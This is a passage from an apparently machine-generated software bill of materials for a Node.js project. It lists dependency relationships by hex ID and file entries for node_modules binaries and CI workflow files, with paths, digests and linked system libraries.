a":{"kind":"primary"}},{"parent":"dabea341270367ac","child":"560e37438ce30be1","type":"dependency-of"},{"parent":"dabea341270367ac","child":"7bcabe4027921ced","type":"dependency-of"},{"parent":"dabea341270367ac","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"dadb042585b0fc99","child":"122ede063714b5b3","type":"dependency-of"},{"parent":"dadb042585b0fc99","child":"8da722cb9983d6b3","type":"dependency-of"},{"parent":"dadb042585b0fc99","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"dc02d9fca5801675","child":"4688a05ee871df84","type":"dependency-of"},{"parent":"dc02d9fca5801675","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"dc31731ddf283ca7","child":"4180007fa4dbcaa3","type":"dependency-of"},{"parent":"dc31731ddf283ca7","child":"756085ffd4026f3c","type":"dependency-of"},{"parent":"dc31731ddf283ca7","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"dc47801cc9b2ec78","child":"122ede063714b5b3","type":"dependency-of"},{"parent":"dc47801cc9b2ec78","child":"2ebcc52db7d200cb","type":"dependency-of"},{"parent":"dc47801cc9b2ec78","child":"f96d5af8de184f83","type":"dependency-of"},{"parent":"dc47801cc9b2ec78","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"dc69ebae19192ee6","child":"96c78782a0a6a6e8","type":"dependency-of"},{"parent":"dc69ebae19192ee6","child":"9fd87e687c3b74ca","type":"dependency-of"},{"parent":"dc69ebae19192ee6","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"dcf7df343a75d233","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"dda6f1aef9d11e58","child":"a5b5323abf9aae9f","type":"dependency-of"},{"parent":"dda6f1aef9d11e58","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"dde504db4cea8c91","child":"bbb181fdab2eb6da","type":"dependency-of"},{"parent":"dde504db4cea8c91","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"de6527b74c32bd7a","child":"7eee1dce79d34bd0","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"deca1a198ab80d23","child":"91c59a4a431b283f","type":"dependency-of"},{"parent":"deca1a198ab80d23","child":"ee26fc9f2aa2694f","type":"dependency-of"},{"parent":"deca1a198ab80d23","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"df154b64f7d4588a","child":"2ebcc52db7d200cb","type":"dependency-of"},{"parent":"df154b64f7d4588a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"df6234ea1d1790c8","child":"14c55cee8eb4e77f","type":"dependency-of"},{"parent":"df6234ea1d1790c8","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e010d1b3c9ab0c02","child":"d035c2d2cba76761","type":"dependency-of"},{"parent":"e010d1b3c9ab0c02","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e11d2a355e0d2438","child":"756085ffd4026f3c","type":"dependency-of"},{"parent":"e11d2a355e0d2438","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e1894e7a0de3acac","child":"c52cdc280efaa4d0","type":"dependency-of"},{"parent":"e1894e7a0de3acac","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e1f90862acd15bdd","child":"cefeafe40657f94b","type":"dependency-of"},{"parent":"e1f90862acd15bdd","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e40c9e2062507e8a","child":"3329ff372baa3c68","type":"dependency-of"},{"parent":"e40c9e2062507e8a","child":"9c42ff2fa50e9c68","type":"dependency-of"},{"parent":"e40c9e2062507e8a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e47d9046945afbeb","child":"0b1fbe7259e117a1","type":"dependency-of"},{"parent":"e47d9046945afbeb","child":"1157d16cad8b2ffc","type":"dependency-of"},{"parent":"e47d9046945afbeb","child":"1fadca0371d5cfaf","type":"dependency-of"},{"parent":"e47d9046945afbeb","child":"303a44f8f6ca903e","type":"dependency-of"},{"parent":"e47d9046945afbeb","child":"336621830c576ca4","type":"dependency-of"},{"parent":"e47d9046945afbeb","child":"49a7c54fcd626265","type":"dependency-of"},{"parent":"e47d9046945afbeb","child":"6699f516cd09331f","type":"dependency-of"},{"parent":"e47d9046945afbeb","child":"6c7ed5b8c0bd71e8","type":"dependency-of"},{"parent":"e47d9046945afbeb","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e635ba578a775ab5","child":"ee26fc9f2aa2694f","type":"dependency-of"},{"parent":"e635ba578a775ab5","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e6774efb67a1cd80","child":"04b33f5cfaf593a5","type":"dependency-of"},{"parent":"e6774efb67a1cd80","child":"7bcabe4027921ced","type":"dependency-of"},{"parent":"e6774efb67a1cd80","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e689757d7bf8470d","child":"98bcef2cdcc9941a","type":"dependency-of"},{"parent":"e689757d7bf8470d","child":"d2a573a75d297737","type":"dependency-of"},{"parent":"e689757d7bf8470d","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e6979906f7b5cde7","child":"09afc93bd06904eb","type":"dependency-of"},{"parent":"e6979906f7b5cde7","child":"756085ffd4026f3c","type":"dependency-of"},{"parent":"e6979906f7b5cde7","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e6b383b17df8c845","child":"dde504db4cea8c91","type":"dependency-of"},{"parent":"e6b383b17df8c845","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e6c60d0f52ae43b7","child":"7bcabe4027921ced","type":"dependency-of"},{"parent":"e6c60d0f52ae43b7","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e6d30724fc0ed7cf","child":"24d45580f4c0f7bb","type":"dependency-of"},{"parent":"e6d30724fc0ed7cf","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e6e064efe5c17d2c","child":"4180007fa4dbcaa3","type":"dependency-of"},{"parent":"e6e064efe5c17d2c","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e700f7d1572a4159","child":"bfc90f0951098a84","type":"dependency-of"},{"parent":"e700f7d1572a4159","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e733388ffa39ebc5","child":"e1f90862acd15bdd","type":"dependency-of"},{"parent":"e733388ffa39ebc5","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e7be86c370ee2217","child":"b71f2c964dcb79d3","type":"dependency-of"},{"parent":"e7be86c370ee2217","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e7e9dd6a07994e54","child":"303a44f8f6ca903e","type":"dependency-of"},{"parent":"e7e9dd6a07994e54","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e8052476c35410ff","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e8863a3d87ad712b","child":"dc31731ddf283ca7","type":"dependency-of"},{"parent":"e8863a3d87ad712b","child":"e6e064efe5c17d2c","type":"dependency-of"},{"parent":"e8863a3d87ad712b","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e92c8ae8d8c83e78","child":"2ebcc52db7d200cb","type":"dependency-of"},{"parent":"e92c8ae8d8c83e78","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e96668e505272792","child":"560e37438ce30be1","type":"dependency-of"},{"parent":"e96668e505272792","child":"5cc521e50bb4314d","type":"dependency-of"},{"parent":"e96668e505272792","child":"7bcabe4027921ced","type":"dependency-of"},{"parent":"e96668e505272792","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e972502f7a8ea944","child":"ce10aea6db36304a","type":"dependency-of"},{"parent":"e972502f7a8ea944","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e9a4a6eb4de31a0f","child":"06f084fd7c9154ab","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e9a4a6eb4de31a0f","child":"0dc26b5347e8f4df","type":"dependency-of"},{"parent":"e9c9cc83bf436fd2","child":"bbb181fdab2eb6da","type":"dependency-of"},{"parent":"e9c9cc83bf436fd2","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"e9e84f484cfaf367","child":"4180007fa4dbcaa3","type":"dependency-of"},{"parent":"e9e84f484cfaf367","child":"756085ffd4026f3c","type":"dependency-of"},{"parent":"e9e84f484cfaf367","child":"e6e064efe5c17d2c","type":"dependency-of"},{"parent":"e9e84f484cfaf367","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ea1b10e091012c4d","child":"302884898f3a35c4","type":"dependency-of"},{"parent":"ea1b10e091012c4d","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ea42e35a908d5ccd","child":"154697ca4fb19b8b","type":"dependency-of"},{"parent":"ea42e35a908d5ccd","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"eb8b761fb0d3a989","child":"e1894e7a0de3acac","type":"dependency-of"},{"parent":"eb8b761fb0d3a989","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ecd22ec88d1d110f","child":"3f225c34b86f8909","type":"dependency-of"},{"parent":"ecd22ec88d1d110f","child":"e700f7d1572a4159","type":"dependency-of"},{"parent":"ecd22ec88d1d110f","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ecd3152d103ea0f9","child":"fb550e5d7052cd7e","type":"dependency-of"},{"parent":"ecd3152d103ea0f9","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"edf229ed71e6ba52","child":"3103913e34f4201d","type":"dependency-of"},{"parent":"edf229ed71e6ba52","child":"3e1fba314601b9a8","type":"dependency-of"},{"parent":"edf229ed71e6ba52","child":"bfc90f0951098a84","type":"dependency-of"},{"parent":"edf229ed71e6ba52","child":"d2a573a75d297737","type":"dependency-of"},{"parent":"edf229ed71e6ba52","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ee061a11e32e10c1","child":"c6cc7a145d3e597c","type":"dependency-of"},{"parent":"ee061a11e32e10c1","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ee16619fa3035ca6","child":"e6b383b17df8c845","type":"dependency-of"},{"parent":"ee16619fa3035ca6","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ee26fc9f2aa2694f","child":"775c553ab4f0a485","type":"dependency-of"},{"parent":"ee26fc9f2aa2694f","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ef14348a3e7aef73","child":"588683a1923c27d7","type":"dependency-of"},{"parent":"ef14348a3e7aef73","child":"a519bffcd9b56c6d","type":"dependency-of"},{"parent":"ef14348a3e7aef73","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ef4974ec29f2dcac","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"efdaea275ca01865","child":"0b1fbe7259e117a1","type":"dependency-of"},{"parent":"efdaea275ca01865","child":"1157d16cad8b2ffc","type":"dependency-of"},{"parent":"efdaea275ca01865","child":"1fadca0371d5cfaf","type":"dependency-of"},{"parent":"efdaea275ca01865","child":"303a44f8f6ca903e","type":"dependency-of"},{"parent":"efdaea275ca01865","child":"336621830c576ca4","type":"dependency-of"},{"parent":"efdaea275ca01865","child":"49a7c54fcd626265","type":"dependency-of"},{"parent":"efdaea275ca01865","child":"6699f516cd09331f","type":"dependency-of"},{"parent":"efdaea275ca01865","child":"6c7ed5b8c0bd71e8","type":"dependency-of"},{"parent":"efdaea275ca01865","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f0415e28bd0fa73d","child":"3344aade71052029","type":"dependency-of"},{"parent":"f0415e28bd0fa73d","child":"4180007fa4dbcaa3","type":"dependency-of"},{"parent":"f0415e28bd0fa73d","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f14dd9ed0ebaa5a4","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f161741909d3d58f","child":"2ebcc52db7d200cb","type":"dependency-of"},{"parent":"f161741909d3d58f","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f17e31d5db2de66e","child":"05997a7e636d9fd8","type":"dependency-of"},{"parent":"f17e31d5db2de66e","child":"59bf565b491e939f","type":"dependency-of"},{"parent":"f17e31d5db2de66e","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f26df386702211f3","child":"2a2c690594e77e74","type":"dependency-of"},{"parent":"f26df386702211f3","child":"51dda2f8a6d52783","type":"dependency-of"},{"parent":"f26df386702211f3","child":"71e9d3c366707710","type":"dependency-of"},{"parent":"f26df386702211f3","child":"f54f88caa8e97b5c","type":"dependency-of"},{"parent":"f26df386702211f3","child":"fb550e5d7052cd7e","type":"dependency-of"},{"parent":"f26df386702211f3","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f29c1976ad3d8cb0","child":"aa3886c02ba5c2c5","type":"dependency-of"},{"parent":"f29c1976ad3d8cb0","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f2d04f064acf1b61","child":"83c2ace663a40ea8","type":"dependency-of"},{"parent":"f2d04f064acf1b61","child":"a9792237818f8415","type":"dependency-of"},{"parent":"f2d04f064acf1b61","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f3444a348db654fb","child":"104b985242c58dc2","type":"dependency-of"},{"parent":"f3444a348db654fb","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f3acb6a3529e1191","child":"22f6c66ddf9c06f1","type":"dependency-of"},{"parent":"f3acb6a3529e1191","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f45608cb782e3ae1","child":"9d0845c4768cfcf5","type":"dependency-of"},{"parent":"f45608cb782e3ae1","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f485e6463dfab8af","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f54f88caa8e97b5c","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f5ead8ead936acd7","child":"2ebcc52db7d200cb","type":"dependency-of"},{"parent":"f5ead8ead936acd7","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f605927959537dfd","child":"8da722cb9983d6b3","type":"dependency-of"},{"parent":"f605927959537dfd","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f61b69e470287928","child":"7bcabe4027921ced","type":"dependency-of"},{"parent":"f61b69e470287928","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f7259be6132b188d","child":"2d10e944bb8687bf","type":"dependency-of"},{"parent":"f7259be6132b188d","child":"91bc09c317f85f97","type":"dependency-of"},{"parent":"f7259be6132b188d","child":"ac843d04db23cee1","type":"dependency-of"},{"parent":"f7259be6132b188d","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f76e4353403c9c3d","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f7f4c134629f3b3a","child":"16f11e75cb882477","type":"dependency-of"},{"parent":"f7f4c134629f3b3a","child":"4180007fa4dbcaa3","type":"dependency-of"},{"parent":"f7f4c134629f3b3a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f7f7aa302949d36c","child":"983a70fcd42b01da","type":"dependency-of"},{"parent":"f7f7aa302949d36c","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f8adcbfce494f378","child":"eb8b761fb0d3a989","type":"dependency-of"},{"parent":"f8adcbfce494f378","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f8e1d8922cf56c54","child":"1b9db533b6297450","type":"dependency-of"},{"parent":"f8e1d8922cf56c54","child":"41ee91a75a779a86","type":"dependency-of"},{"parent":"f8e1d8922cf56c54","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f8f74773abf739cd","child":"03ef00f42507be2f","type":"dependency-of"},{"parent":"f8f74773abf739cd","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f9190921d6308e46","child":"5cc521e50bb4314d","type":"dependency-of"},{"parent":"f9190921d6308e46","child":"ecd3152d103ea0f9","type":"dependency-of"},{"parent":"f9190921d6308e46","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f92fb588898c98cc","child":"bbb181fdab2eb6da","type":"dependency-of"},{"parent":"f92fb588898c98cc","child":"c2726c8cb18290f2","type":"dependency-of"},{"parent":"f92fb588898c98cc","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f96d5af8de184f83","child":"fb550e5d7052cd7e","type":"dependency-of"},{"parent":"f96d5af8de184f83","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f9a24c0655f5cc44","child":"04b33f5cfaf593a5","type":"dependency-of"},{"parent":"f9a24c0655f5cc44","child":"62bf6c85ca605f5a","type":"dependency-of"},{"parent":"f9a24c0655f5cc44","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"f9cf628256388076","child":"043761526fd95886","type":"dependency-of"},{"parent":"f9cf628256388076","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fa54533e742eac71","child":"bbe9092f97742247","type":"dependency-of"},{"parent":"fa54533e742eac71","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fa7ef7424a021d69","child":"338eac46e71d483e","type":"dependency-of"},{"parent":"fa7ef7424a021d69","child":"64572c87855a75b1","type":"dependency-of"},{"parent":"fa7ef7424a021d69","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fb550e5d7052cd7e","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fb8802f2379acb63","child":"656ffeda0aaf4e8b","type":"dependency-of"},{"parent":"fb8802f2379acb63","child":"691f5259c0d155d0","type":"dependency-of"},{"parent":"fb8802f2379acb63","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fc2d97a12d1a4dda","child":"588683a1923c27d7","type":"dependency-of"},{"parent":"fc2d97a12d1a4dda","child":"a519bffcd9b56c6d","type":"dependency-of"},{"parent":"fc2d97a12d1a4dda","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fc983ad918ad063a","child":"7bcabe4027921ced","type":"dependency-of"},{"parent":"fc983ad918ad063a","child":"bf2c5c4cccddf639","type":"dependency-of"},{"parent":"fc983ad918ad063a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fcc3d45495abf3bd","child":"d7348151a8592cc2","type":"dependency-of"},{"parent":"fcc3d45495abf3bd","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fcd80b2c54be3c8f","child":"338eac46e71d483e","type":"dependency-of"},{"parent":"fcd80b2c54be3c8f","child":"7749e9981a33e1c1","type":"dependency-of"},{"parent":"fcd80b2c54be3c8f","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fd10fce47017fa13","child":"7eee1dce79d34bd0","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fd64c295f8bc0b6a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fdb02e46c7ca0cd4","child":"2a2bae4730b1aafc","type":"dependency-of"},{"parent":"fdb02e46c7ca0cd4","child":"49e5593cb4d5046f","type":"dependency-of"},{"parent":"fdb02e46c7ca0cd4","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fe4d11ddc8ba95f7","child":"4fb04863a4dacd73","type":"dependency-of"},{"parent":"fe4d11ddc8ba95f7","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"fea7469744f21377","child":"646f82a1b8ded3b2","type":"dependency-of"},{"parent":"fea7469744f21377","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"ff4544477cbe31d7","child":"3103913e34f4201d","type":"dependency-of"},{"parent":"ff4544477cbe31d7","child":"bfc90f0951098a84","type":"dependency-of"},{"parent":"ff4544477cbe31d7","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}}],"files":[{"id":"34887f26bc3e9d5d","location":{"path":"/node_modules/@esbuild/darwin-arm64/bin/esbuild"},"metadata":{"mode":755,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"application/x-mach-binary","size":9859426},"digests":[{"algorithm":"sha1","value":"4779fea4cf08285bd8db968295136164a44803e4"},{"algorithm":"sha256","value":"b81b084018b48549fced4d72ac6a9d820aec907aff4ec546aef4a8703fee8dcc"}],"executable":{"format":"macho","hasExports":false,"hasEntrypoint":true,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/Security.framework/Versions/A/Security","/usr/lib/libSystem.B.dylib","/usr/lib/libresolv.9.dylib"]}},{"id":"35ed6f390e7fbd9a","location":{"path":"/node_modules/@img/sharp-darwin-arm64/lib/sharp-darwin-arm64.node"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":false,"importedLibraries":["/usr/lib/libSystem.B.dylib","/usr/lib/libc++.1.dylib","@rpath/libvips-cpp.8.17.3.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"a9e75b7115c725f3","location":{"path":"/node_modules/@img/sharp-libvips-darwin-arm64/lib/libvips-cpp.8.17.3.dylib"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":false,"importedLibraries":["/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit","/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics","/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices","/System/Library/Frameworks/CoreText.framework/Versions/A/CoreText","/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation","/usr/lib/libSystem.B.dylib","/usr/lib/libc++.1.dylib","/usr/lib/libiconv.2.dylib","/usr/lib/libobjc.A.dylib","/usr/lib/libresolv.9.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"70d6807a198be5af","location":{"path":"/node_modules/@next/swc-darwin-arm64/next-swc.darwin-arm64.node"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":false,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices","/System/Library/Frameworks/Security.framework/Versions/A/Security","/usr/lib/libSystem.B.dylib","/usr/lib/libiconv.2.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"737caf48833ccd84","location":{"path":"/node_modules/@prisma/engines/libquery_engine-darwin-arm64.dylib.node"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":false,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/Security.framework/Versions/A/Security","/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration","/usr/lib/libSystem.B.dylib","/usr/lib/libiconv.2.dylib","/usr/lib/libz.1.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"94150e913aee0336","location":{"path":"/node_modules/@prisma/engines/schema-engine-darwin-arm64"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":true,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/Security.framework/Versions/A/Security","/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration","/usr/lib/libSystem.B.dylib","/usr/lib/libiconv.2.dylib","/usr/lib/libz.1.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"4f348d7f938383d0","location":{"path":"/node_modules/@rollup/rollup-darwin-arm64/rollup.darwin-arm64.node"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":false,"importedLibraries":["/usr/lib/libSystem.B.dylib","/usr/lib/libiconv.2.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"a59c06faa8b1f418","location":{"path":"/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml"},"metadata":{"mode":644,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"text/plain","size":872},"digests":[{"algorithm":"sha1","value":"d8b9d52a449215289e7f86f6d1b6cf34cf7b3bff"},{"algorithm":"sha256","value":"d1e61aa7fafbbcc49d7fb88a78c59ce2c10277e7eb4a3a38d8d26e355b9c0bea"}]},{"id":"5ba40cf7d5aca19e","location":{"path":"/node_modules/busboy/.github/workflows/ci.yml"},"metadata":{"mode":644,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"text/plain","size":518},"digests":[{"algorithm":"sha1","value":"ed17e749dd7bbfaad813a7c8c26bc326526c2e9e"},{"algorithm":"sha256","value":"5c9c3871cbded8303801b572ec8c873e61c4286e15470d57b758522a2a6083f0"}]},{"id":"8d6c8207e0a0d1a8","location":{"path":"/node_modules/busboy/.github/workflows/lint.yml"},"metadata":{"mode":644,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"text/plain","size":471},"digests":[{"algorithm":"sha1","value":"954cdc06cee4b5c6235cf29df588ad9937f40341"},{"algorithm":"sha256","value":"3dbdd9b8482cf250da0d4160e61f968918bf119a5808e553270733fc11fcfc21"}]},{"id":"06f084fd7c9154ab","location":{"path":"/node_modules/esbuild/bin/esbuild"},"metadata":{"mode":755,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"application/x-mach-binary","size":9859426},"digests":[{"algorithm":"sha1","value":"4779fea4cf08285bd8db968295136164a44803e4"},{"algorithm":"sha256","value":"b81b084018b48549fced4d72ac6a9d820aec907aff4ec546aef4a8703fee8dcc"}],"executable":{"format":"macho","hasExports":false,"hasEntrypoint":true,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/Security.framework/Versions/A/Security","/usr/lib/libSystem.B.dylib","/usr/lib/libresolv.9.dylib"]}},{"id":"caf8d43bd5fa2c58","location":{"path":"/node_modules/fsevents/fsevents.node"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":false,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices","/usr/lib/libSystem.B.dylib","/usr/lib/libc++.1.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"e2578e73e64dfa23","location":{"path":"/node_modules/prisma/libquery_engine-darwin-arm64.dylib.node"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":false,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/Security.framework/Versions/A/Security","/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration","/usr/lib/libSystem.B.dylib","/usr/lib/libiconv.2.dylib","/usr/lib/libz.1.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"7eee1dce79d34bd0","location":{"path":"/node_modules/reusify/.github/workflows/ci.yml"},"metadata":{"mode":644,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"text/plain","size":1775},"digests":[{"algorithm":"sha1","value":"46a64a3a41de42fb7efbab61e8c8662f8181e602"},{"algorithm":"sha256","value":"2518554c9d38a88c89d09c005367745909dc55db127560856cb044abbe698117"}]},{"id":"d9e0fefdafb4a938","location":{"path":"/node_modules/stream-shift/.github/workflows/test.yml"},"metadata":{"mode":644,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"text/plain","size":498},"digests":[{"algorithm":"sha1","value":"92cfca9fdbe97fe80cf30ffd1884af98dfd97834"},{"algorithm":"sha256","value":"362333ff93e95bed34ff78de0ec39287c23ab29a57eb2af98b4602237ed92a68"}]},{"id":"9ab14596fb383648","location":{"path":"/node_modules/streamsearch/.github/workflows/ci.yml"},"metadata":{"mode":644,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"text/plain","size":509},"digests":[{"algorithm":"sha1","value":"d7f4dc6a11b7b9fb0da1c509aa1d63b920e2650d"},{"algorithm":"sha256","value":"ae83a8862cc650e1b6ee1214ec6668d53f0a9600db4e7fdab286d18355405652"}]},{"id":"96fa00e77b6e4b30","location":{"path":"/node_modules/streamsea